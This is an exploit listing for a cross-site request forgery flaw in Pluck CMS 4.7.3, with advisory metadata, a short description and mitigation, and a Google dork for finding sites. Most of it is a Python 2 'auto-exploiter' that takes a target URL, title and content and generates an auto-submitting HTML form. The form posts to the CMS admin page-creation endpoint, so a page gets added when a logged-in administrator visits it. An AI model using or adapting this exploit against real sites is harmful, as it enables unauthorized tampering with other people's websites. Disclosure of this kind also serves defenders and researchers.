Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery

vendor:

Pluck CMS

by:

Ahsan Tahir

8,8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Pluck CMS

Affected Version From: 4.7.3

Affected Version To: 4.7.3

Patch Exists: NO

Related CWE: N/A

CPE: a:pluck_cms:pluck_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Kali Linux 2.0, Windows 8.1

2016

Pluck CMS 4.7.3 – Add-Page Cross-Site Request Forgery

Pluck CMS 4.7.3 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can exploit this vulnerability to add a page to the target website by crafting a malicious HTML page and tricking an authenticated user into visiting it. The malicious HTML page contains a form with hidden fields that are automatically submitted when the user visits the page. The form contains the title, content, description, keywords, hidden, sub-page, theme, and save fields. When the form is submitted, the page is added to the target website.

Mitigation:

To mitigate Cross-Site Request Forgery (CSRF) attacks, the application should implement a CSRF token that is unique to each user session. The token should be included in the form and verified by the server before processing the request.

Source

Exploit-DB raw data:

# Exploit Title: Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery
# Exploit Author: Ahsan Tahir
# Date: 18-10-2016
# Software Link: http://www.pluck-cms.org/?file=download
# Vendor: http://www.pluck-cms.org/
# Google Dork: "2005-2016. pluck is available"
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsan-tahir.com
# Category: webapps
# Version: 4.7.3
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com

import os
import urllib

if os.name == 'nt':
		os.system('cls')
else:
	os.system('clear')

def csrfexploit():

	banner = '''
	+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==+
	|  ____  _            _       ____ __  __ ____   |
	| |  _ \| |_   _  ___| | __  / ___|  \/  / ___|  |
	| | |_) | | | | |/ __| |/ / | |   | |\/| \___ \  |
	| |  __/| | |_| | (__|   <  | |___| |  | |___) | |
	| |_|   |_|\__,_|\___|_|\_\  \____|_|  |_|____/  |
	|  //PluckCMS 4.7.3 Add-Post CSRF Auto-Exploiter |
	|  > Exploit Author & Script Coder: Ahsan Tahir  |
	+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
	'''
	print banner

	url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
	title = str(raw_input(" [+] Enter the Title of the Post which you want to add by exploiting CSRF: "))
	content = raw_input(" [+] Enter the Content, which you want to add in the post by exploiting CSRF: ")

	csrfhtmlcode = '''
	<html>
	  <!-- CSRF PoC -->
	  <body>
	    <form action="%s/admin.php?action=editpage" method="POST">
	      <input type="hidden" name="title" value="%s" />
	      <input type="hidden" name="seo&#95;name" value="" />
	      <input type="hidden" name="content" value="%s" />
	      <input type="hidden" name="description" value="" />
	      <input type="hidden" name="keywords" value="" />
	      <input type="hidden" name="hidden" value="no" />
	      <input type="hidden" name="sub&#95;page" value="" />
	      <input type="hidden" name="theme" value="default" />
	      <input type="hidden" name="save" value="Save" />
	      <input type="submit" value="Submit request" />
	    </form>
	  </body>
	</html>
	''' %(url, title, content)

	print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."

	print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
	extension = ".html"
	name = raw_input(" Filename: ")
	filename = name+extension
	file = open(filename, "w")

	file.write(csrfhtmlcode)
	file.close()
	print(" [+] Your exploit is saved as %s")%filename
	print("")

csrfexploit()